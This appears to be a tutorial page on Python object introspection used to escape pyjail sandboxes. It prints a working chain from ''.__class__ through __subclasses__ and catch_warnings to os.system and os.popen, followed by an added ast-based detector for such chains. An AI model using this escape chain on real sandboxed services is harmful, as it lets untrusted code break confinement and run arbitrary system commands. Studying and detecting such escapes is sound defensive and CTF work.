Navigating Python Objects
How to navigate Python objects, and some tricks to bypass Python sandbox protections (pyjails).
Methods
__class__
Returns the class (type) to which the object belongs.
__mro__
Returns a tuple of the classes in a class's inheritance chain (the class itself, then its base classes). Methods are resolved in tuple order.
__subclasses__
Each class keeps references to its subclasses, and this method returns a list of those references that are still alive.
__builtins__
Gives access to the built-in functions and names available to a module or function.
__globals__
A reference to the dictionary that holds the global variables of the module in which a function was defined.
__base__
Returns the base class the class inherits from (__base__ and __mro__ are used to find the base class).
__init__
Class initialization method.
Use dir() to show all methods and attributes of an object.
Navigation
Goal: Find warnings (catch_warnings) because it imports the sys module (see HERE), and from sys you can reach os.
Get the string class
''.__class__
# <class 'str'>
Going up by getting the inherited base classes (object)
''.__class__.__mro__
# (<class 'str'>, <class 'object'>)
Get all subclasses of object
''.__class__.__mro__[1].__subclasses__()
# [<class '…'>, …]
Look for catch_warnings and its index.
for i in range(450):
    print(i, end=' ')
    print(''.__class__.__mro__[1].__subclasses__()[i].__name__)
# index NAME
# index NAME
# etc…
Import os and call the system. You can't see the output.
''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').system("COMMAND")
# error_code or 0 if the command was executed correctly
Import os and call popen with read(). You can see the output.
''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').popen("COMMAND").read()
Resources
pyjailbreaker (yet to be seen)
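A defender-side check for the chain built in the Navigation section, as an added example that is not part of the original page: it parses a submitted expression with ast, without evaluating it, and reports the attribute names and string keys the chain depends on. The names find_navigation, is_allowed and PAGE_CHAIN, and the placeholder index 0, are assumptions made for this example.

```python
import ast

# Names the page's chain relies on: the documented dunders plus the
# catch_warnings attribute (_module) it uses to reach a module object.
NAVIGATION_NAMES = {
    "__class__", "__mro__", "__subclasses__", "__builtins__",
    "__globals__", "__base__", "__init__", "_module",
}

def _suspicious(name):
    is_dunder = len(name) > 4 and name.startswith("__") and name.endswith("__")
    return name in NAVIGATION_NAMES or is_dunder

def find_navigation(source):
    """Return the sorted navigation names used in an expression.

    Only parses the text, never evaluates it. Raises SyntaxError for
    anything that is not a single Python expression.
    """
    hits = set()
    for node in ast.walk(ast.parse(source, mode="eval")):
        if isinstance(node, ast.Attribute) and _suspicious(node.attr):
            hits.add(node.attr)
        # String literals cover subscript keys (x['__import__']) and
        # getattr(x, '__class__') style lookups.
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and _suspicious(node.value)):
            hits.add(node.value)
    return sorted(hits)

def is_allowed(source):
    """Policy for an expression evaluator: reject on any hit or parse error."""
    try:
        return not find_navigation(source)
    except (SyntaxError, ValueError):
        return False

# Constructed sample: the page's chain with a placeholder index of 0.
PAGE_CHAIN = ("''.__class__.__mro__[1].__subclasses__()[0]()"
              "._module.__builtins__['__import__']('os')")

if __name__ == "__main__":
    print(find_navigation(PAGE_CHAIN))
    print(is_allowed("1 + 2 * len('abc')"), is_allowed(PAGE_CHAIN))
```

A static check like this works as input validation and as a logging signal; isolating untrusted code still belongs at the process or OS level.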